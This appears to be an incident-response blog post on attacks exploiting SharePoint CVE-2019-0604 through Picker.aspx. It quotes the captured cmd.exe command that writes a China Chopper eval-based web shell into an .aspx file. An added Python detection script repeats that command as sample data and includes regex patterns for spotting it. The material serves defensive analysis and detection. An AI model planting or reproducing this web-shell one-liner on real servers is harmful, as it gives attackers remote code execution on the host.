Over the past week, I started seeing attacks on SharePoint servers using vulnerability CVE-2019-0604. The Zero Day Initiative has a great write-up(1) on the exploitation of the vulnerability.
Initial detection of the exploit came from endpoint exploit detection. When reviewing the IIS logs, we saw a POST to Picker.aspx. This appears to be the most common entry point for attacks exploiting CVE-2019-0604.
In this case, the attacker dropped a China Chopper payload on the server. China Chopper has been around for a long time; CrowdStrike did a great write-up(2) on it in 2015. The payload is just a one-liner that was echoed into the files from the command line.
The anomaly that endpoint detection flagged was a cmd shell spawned by the w3wp.exe process.
Parent Process: w3wp.exe
"C:\Windows\System32\cmd.exe" /c echo ^<%@ Page Language="Jscript"%^>^<%eval(Request.Item["t"],"unsafe");%^> > "%CommonProgramFiles%\Microsoft Shared\Web Server Extensions\14\TEMPLATE\LAYOUTS\t.aspx" & echo ^<%@ Page Language="Jscript"%^>^<%eval(Request.Item["t"],"unsafe");%^> >
The attack appears to have been an automated drive-by: the attackers did not come back or make any additional modifications to the server.
User agent string: python-requests/2.18.4
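As an added example (not code from this post or its author), the following Python script applies the indicators described above to constructed data: it parses IIS W3C log lines for a POST to Picker.aspx from a python-requests client, lists that client's follow-on requests, and classifies process-creation events where w3wp.exe spawns cmd.exe to echo an eval(Request.Item[...]) one-liner into an .aspx file. The log column layout, the event field names, the IP addresses and the request to t.aspx are assumptions made for illustration.

```python
import re
from typing import Dict, List

# Constructed IIS W3C log excerpt (not from the post). IIS writes spaces in the
# User-Agent as '+', and lines beginning with '#' are directives, not requests.
SAMPLE_IIS_LOG = """\
#Software: Microsoft Internet Information Services 7.5
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status
2019-05-20 10:01:02 10.0.0.5 GET /_layouts/15/start.aspx - 443 CORP\\alice 10.0.0.20 Mozilla/5.0+(Windows+NT+10.0) 200
2019-05-20 10:03:44 10.0.0.5 POST /_layouts/15/Picker.aspx - 443 - 203.0.113.7 python-requests/2.18.4 200
2019-05-20 10:03:45 10.0.0.5 POST /_layouts/15/t.aspx - 443 - 203.0.113.7 python-requests/2.18.4 200
2019-05-20 10:05:10 10.0.0.5 GET /_layouts/15/Picker.aspx - 443 CORP\\bob 10.0.0.21 Mozilla/5.0+(Windows+NT+10.0) 200
"""

PICKER_RE = re.compile(r"/picker\.aspx$", re.IGNORECASE)
# Only python-requests is supported by the post; extend as your own telemetry warrants.
SCRIPTED_UA_RE = re.compile(r"^python-requests/", re.IGNORECASE)


def parse_iis_log(text: str) -> List[Dict[str, str]]:
    """Parse W3C extended IIS log text, taking column names from its #Fields directive."""
    fields: List[str] = []
    records: List[Dict[str, str]] = []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#"):
            continue
        values = line.split(" ")
        if len(values) != len(fields):
            continue  # malformed line: skip rather than misalign columns
        records.append(dict(zip(fields, values)))
    return records


def find_picker_posts(records: List[Dict[str, str]]) -> List[Dict[str, object]]:
    """Flag POSTs to Picker.aspx, the entry point seen in the post, and mark scripted clients."""
    hits: List[Dict[str, object]] = []
    for r in records:
        if r.get("cs-method") != "POST" or not PICKER_RE.search(r.get("cs-uri-stem", "")):
            continue
        ua = r.get("cs(User-Agent)", "").replace("+", " ")
        hits.append({
            "time": f"{r['date']} {r['time']}",
            "client": r.get("c-ip"),
            "user_agent": ua,
            "scripted_client": bool(SCRIPTED_UA_RE.match(ua)),
        })
    return hits


def follow_on_requests(records: List[Dict[str, str]], hits: List[Dict[str, object]]) -> List[Dict[str, str]]:
    """Other requests from clients that POSTed to Picker.aspx; a dropped shell shows up here."""
    clients = {h["client"] for h in hits}
    return [r for r in records
            if r.get("c-ip") in clients and not PICKER_RE.search(r.get("cs-uri-stem", ""))]


# Constructed process-creation events in the shape an EDR or Sysmon Event ID 1 feed
# would give. Field names are this example's own, not any vendor's schema. The first
# command line is the one quoted in the post (up to its first redirect).
SAMPLE_EVENTS = [
    {"parent_image": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "command_line": r'"C:\Windows\System32\cmd.exe" /c echo ^<%@ Page Language="Jscript"%^>^<%eval(Request.Item["t"],"unsafe");%^> > "%CommonProgramFiles%\Microsoft Shared\Web Server Extensions\14\TEMPLATE\LAYOUTS\t.aspx"'},
    {"parent_image": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "command_line": r'"C:\Windows\System32\cmd.exe" /c whoami'},
    {"parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "command_line": r'"C:\Windows\System32\cmd.exe" /c echo hello > C:\Temp\note.txt'},
]

# China Chopper one-liner body as quoted in the post, and a redirect into an .aspx file.
WEBSHELL_BODY_RE = re.compile(r"eval\s*\(\s*Request\.Item\[", re.IGNORECASE)
ASPX_REDIRECT_RE = re.compile(r'>\s*"?[^"]*\.aspx"?', re.IGNORECASE)


def classify_process_event(ev: Dict[str, str]) -> str:
    """'webshell_drop' for the echo-to-.aspx pattern, 'suspicious_shell' for any other
    shell under w3wp.exe, 'benign' otherwise."""
    parent = ev["parent_image"].lower()
    child = ev["image"].lower()
    cmd = ev["command_line"]
    if not parent.endswith("w3wp.exe") or not child.endswith(("cmd.exe", "powershell.exe")):
        return "benign"
    if WEBSHELL_BODY_RE.search(cmd) and ASPX_REDIRECT_RE.search(cmd):
        return "webshell_drop"
    return "suspicious_shell"


if __name__ == "__main__":
    recs = parse_iis_log(SAMPLE_IIS_LOG)
    hits = find_picker_posts(recs)
    for h in hits:
        print("Picker.aspx POST:", h)
    for r in follow_on_requests(recs, hits):
        print("follow-on request:", r["cs-method"], r["cs-uri-stem"], "from", r["c-ip"])
    for ev in SAMPLE_EVENTS:
        print(classify_process_event(ev), "<-", ev["command_line"][:60])
```

A shell spawned by w3wp.exe is worth alerting on by itself; the echo-to-.aspx pattern is what distinguishes a web shell drop from ordinary administrative noise, and the follow-on request from the same client is where the dropped file is actually used.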
Chopper Files created:
Thanks to my team for the analysis.
May 20th 2019